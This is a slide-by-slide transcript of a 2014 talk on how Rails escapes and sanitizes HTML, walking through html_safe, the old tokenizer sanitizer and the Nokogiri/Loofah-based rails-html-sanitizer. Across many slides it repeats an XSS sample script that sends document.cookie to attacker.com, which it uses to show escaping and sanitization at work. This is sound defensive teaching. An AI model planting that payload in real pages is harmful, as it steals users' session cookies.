Rails: The hidden parts

Rails: The hidden parts

0525b332aafb83307b32d9747a93de03?s=128

Rafael França

April 26, 2014
Tweet

Transcript

  1. Rails the hidden parts

  2. Rafael França @rafaelfranca

  3. None
  4. None
  5. InheritedResources Responders show_for I18nAlchemy rails-api

  6. Carlos Antonio Rafael França José Valim 
 Co-founder of Plataformatec

    http://rubyonrails.org/core
  7. http://elixir-lang.org/

  8. Core Team Member

  9. None
  10. None
  11. Rails has a lot of cool features

  12. Encrypted cookies Active Record Queries View Helpers Migrations Generators Notifications

    Constant missing hooks
  13. Convention over configuration

  14. Some features we use without even knowing

  15. HTML escaping

  16. None
  17. Photo <%= @photo.description %>

  18. Hello loser! <script> document.write( '<img src="http://www.attacker.com/' + document.cookie + '">'

    ); </script> User input
  19. What will happen?

  20. Hello loser! <script> document.write( '<img src="http://www.attacker.com/' + document.cookie + '">'

    ); </script> Unescaped value
  21. <%=h @photo.description %> Call html_escape

  22. Escaped Result Hello loser! &lt;script&gt; document.write( &#39;&lt;img src=&quot;http://www.attacker.com/&#39; + document.cookie

    + &#39;&quot;&gt;&#39; ); &lt;/script&gt;
  23. OMG! I forgot to use this!

  24. Don’t worry, today you are safe

  25. Rails 3+ escapes the result

  26. This dog is <b>so cute</b>! User input

  27. This dog is &lt;b&gt;so cute&lt;/ b&gt;! Escaped result

  28. All strings are unsafe unless you tell they are safe

  29. string = "my string" # => "my string” ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string” ! safe_string.html_safe? # => true HTML safety check
  30. string = "my string" # => "my string” ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string” ! safe_string.html_safe? # => true HTML safety check
  31. string = "my string" # => "my string” ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string” ! safe_string.html_safe? # => true HTML safety check
  32. my_html_string = "<b>HTML</b>" # => “<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => “&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  33. my_html_string = "<b>HTML</b>" # => “<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => “&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  34. my_html_string = "<b>HTML</b>" # => “<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => “&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  35. In most cases you don’t need to worry about marking

    strings as safe
  36. <%= raw @photo.description %> Mark as safe

  37. HTML sanitization

  38. Get your text and remove HTML tags

  39. <%= sanitize @user.description %> Calling sanitize

  40. helper.sanitize( “This dog is <b>so cute</b>!" ) # => “This

    dog is <b>so cute</b>!" Safe value
  41. helper.sanitize(%{ Hello loser! <script> document.write( '<img src="http://www.attacker.com/' + document.cookie +

    '">' ); </script> }) # Hello loser! # <img src=\"http://www.attacker.com/&#39; + # document.cookie + # &#39;\">' # );
  42. How it works

  43. Tokenizer

  44. bad_string = <<STRING Hello loser! <script> document.write( '<img src="http://www.attacker.com/' +

    document.cookie + '">' ); </script> STRING
  45. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  46. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  47. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  48. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  49. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  50. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  51. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  52. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  53. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  54. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  55. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  56. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  57. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  58. Nodes nodes = tokenize(bad_string) # => [#<HTML::Text:..., …] ! nodes.map

    { |node| node.class } # => [HTML::Text, HTML::Tag, HTML::Text, # HTML::Tag, HTML::Text, HTML::Tag, HTML::Text]
  59. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  60. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  61. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  62. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  63. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  64. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  65. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  66. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  67. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  68. Sanitizer

  69. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result= [] while token =

    tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) process_node(node, result) end result end ! def process_node(node, result) result << node.to_s end
  70. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result= [] while token =

    tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) process_node(node, result) end result end ! def process_node(node, result) result << node.to_s end
  71. Sanitizers • FullSanitizer! • LinkSanitizer! • WhiteListSanitizer

  72. def process_node(node, result) result << node.to_s if node.class == Node::Text

    end Full Sanitizer
  73. Problems • code is hard to maintain • use regular

    expressions to tokenize the string • very error prone • changing this code can open security holes
  74. Rails Html Sanitizer rafaelfranca/rails-html-sanitizers

  75. Google Summer of Code

  76. @kaspth

  77. Powered by Nokogiri

  78. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  79. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  80. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  81. Powered by Loofah

  82. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  83. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  84. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  85. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  86. How the new implementation works

  87. Tokenizer

  88. It is Nokogiri

  89. Sanitizers • FullSanitizer! • LinkSanitizer! • WhiteListSanitizer

  90. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>…" ) # => Bold no more! See more here...
  91. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>…" ) # => Bold no more! See more here...
  92. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>…" ) # => Bold no more! See more here...
  93. LinkSanitizer link_sanitizer = Rails::Html::LinkSanitizer.new ! link_sanitizer.sanitize( '<a href="example.com">Only the link

    text will be kept.</a>’ ) # => Only the link text will be kept.
  94. LinkSanitizer link_sanitizer = Rails::Html::LinkSanitizer.new ! link_sanitizer.sanitize( '<a href="example.com">Only the link

    text will be kept.</a>’ ) # => Only the link text will be kept.
  95. LinkSanitizer link_sanitizer = Rails::Html::LinkSanitizer.new ! link_sanitizer.sanitize( '<a href="example.com">Only the link

    text will be kept.</a>’ ) # => Only the link text will be kept.
  96. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  97. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  98. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  99. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  100. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  101. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  102. Custom Sanitizer! class MySerializer < Rails::Html::Sanitizer def sanitize(html, options =

    {}) Loofah.scrub_fragment(html, MyCustomScrubber.new).to_s end end
  103. Scrubbers • PermitScrubber! • TargetScrubber

  104. Scrubbers spam2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  105. Scrubbers spam2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  106. Scrubbers spam2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  107. Scrubbers white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)

  108. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  109. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  110. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  111. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  112. Problems • Some HTML 5 documents are invalid for Nokogiri

    • Nokogiri requires libxml, which may not work on Windows • Some applications may break when upgrading
  113. And there are a lot more hidden features

  114. Try to understand them

  115. Contribute back

  116. The best feature of Rails

  117. Is our community

  118. Thank you Rafael França github.com/ twitter.com/ rafaelfranca rafaelfranca